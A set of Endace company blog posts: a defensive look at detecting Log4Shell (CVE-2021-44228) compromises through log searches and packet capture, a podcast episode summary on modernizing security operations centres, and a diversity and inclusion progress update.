Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace

Michael Morris, Director of Global Business Development, Endace

Log4J 2 - how can you see if you've been attacked?Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat?  Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. This gives remote unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:


Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Network Unit 42, that discuss the risk, scale, and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, KeySight Technology, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found you need to isolate and investigate for any potential compromises. It’s essential to put in place policies, rules, and filter protections to monitor outbound egress of traffic to unknown IP addresses. Apply filters and pay extra attention to common traffic protocols like LDAP, LDAPS, RMI, DNS as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.

Of course, you should also ensure your IDS’s or firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata on a SIEM such as Splunk or Elastic, the first place to start looking would be to search all http transactions for strings including JNDI calls. Our partner, Splunk, published a blog on how to do this here:


Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video of how to use Wireshark to identify and analyze a Log4j2 attack. Well worth watching:

Once you have identified connections that contain the JNDI string you can quickly examine any the subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading java malware to infect your server. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4J 2 and other zero-day attacks go to www.endace.com.

Endace Packet Forensics Files: Episode #31

Original Entry by : Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace

Michael Morris, Director of Global Business Development, Endace

Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field against today’s threat actors. Whether it is adapting to simply keep up with the volume of threats or implementing AI and ML technologies to find and prevent more sophisticated threat vectors SecOps need to improve and upgrade.

In this episode of the Endace Packet Forensic files, I talk with seasoned SOC Director, Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between various industry verticals like governments, financial, energy and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.

Diversity and Inclusion at Endace

Original Entry by : Katrina Schollum

By Katrina Schollum, People Partner, Endace

Since we established our Diversity and Inclusion Committee earlier this year, we have been busy working to cement the importance of our Diversity and Inclusion program at Endace.

As a group, we have held regular discussions across our four focus areas; gender, ethnicity, generations and people with different abilities, to establish how we can achieve positive outcomes for people and the business, increase awareness and break down barriers. We are committed to community-led objectives that support and celebrate individuality and foster a sense of belonging for everyone. In this blog post we are pleased to share some of our progress.

Establishing Who We Are

It was important to us to understand who we are at Endace, and what is important to us as we shape our path forward.

We created anonymous reporting on gender, nationality and cultural ethnicity and were able to share the statistical data visually with the whole organisation, which we will continue to do as we track our changes over time. We can report we have at least 24 different nationalities within Endace and we are extremely proud of our very culturally diverse workplace.
One of our biggest pieces of work was an internal survey that sought specific input across our four key areas. The Committee invested a lot of effort into asking the right questions so we could understand where there was lack of clarity, what areas we are doing well and what areas need improvement to focus on. As a result, we were able to clarify our key messages and share these across the organization via various channels including workshops, promotional activity such as email newsletters and posters, and team meetings.

Diwali Decoration Competition - Endace
Winning Diwali entry

We were also able to meet a popular requests to celebrate key cultural celebrations throughout the year – such as sharing Māori themed food at our New Zealand offices to celebrate Matariki (which marks the beginning of the new year in the Māori lunar calendar). In addition, we celebrated Diwali with a global team competition to learn more about this festival of lights. We plan to promote and celebrate many more of these occasions on an ongoing basis – giving everyone at Endace an opportunity to learn more about other cultures represented in the team.

These activities are all great examples of the success of our community-led approach. By seeking input from the entire team we better understand what’s important and where we can add value to our diversity and inclusion initiatives. Sometimes it is relatively simple things that can make a big difference.

Community Led Initiatives
Marjo Montejo - Endace - reflects on Women in Technology Day
Marjo Montejo reflects on women in technology on International Women’s Day

Our Committee has put together a plan of strategic, measurable objectives from our group discussions. Some of the activities that have already been delivered including calendar events such as World Autism Awareness Day. We also highlighted International Women’s Day by sharing photos and personal stories about what the day meant to our team, and about what it means to be a woman in the tech industry.

We also recently held Cultural Intelligence workshops that were attended by 79.5% of our organisation. The workshops gave us tools to improve on the understanding of cultures other than our own and break down barriers to support greater participation, integration and increase the sense of belonging.

Recently, for Transgender Awareness Week, a member of our transgender community at Endace shared his story in a powerful interview with Sasha Blair, VP People & Legal, to answer some questions about the trans community and his experiences. The recording was shared internally and some fantastic feedback was received. Our ongoing conversations around gender have made a noticeable difference in using gender-neutral and inclusive language.

What’s Next?

Looking ahead, we have planned some thought-provoking activities to celebrate and support individuals. The immediate focus will be educating ourselves on Neurodiversity and understanding how it adds value to our business.

Neurodiversity in the tech sector has at times been overlooked but major tech organisations are making great strides in this area and we are keen to see how we can contribute to these initiatives too.

While change takes time, we will continue to celebrate what makes Endace unique and keep taking steps to ensure our team can strengthen their feeling of belonging, and feel their individual voices are heard, valued and respected. We anticipate the more initiatives we implement in our organisation, the more positive outcomes we will observe. Our agenda will support our achieving an increasingly inclusive environment and we look forward to sharing our progress.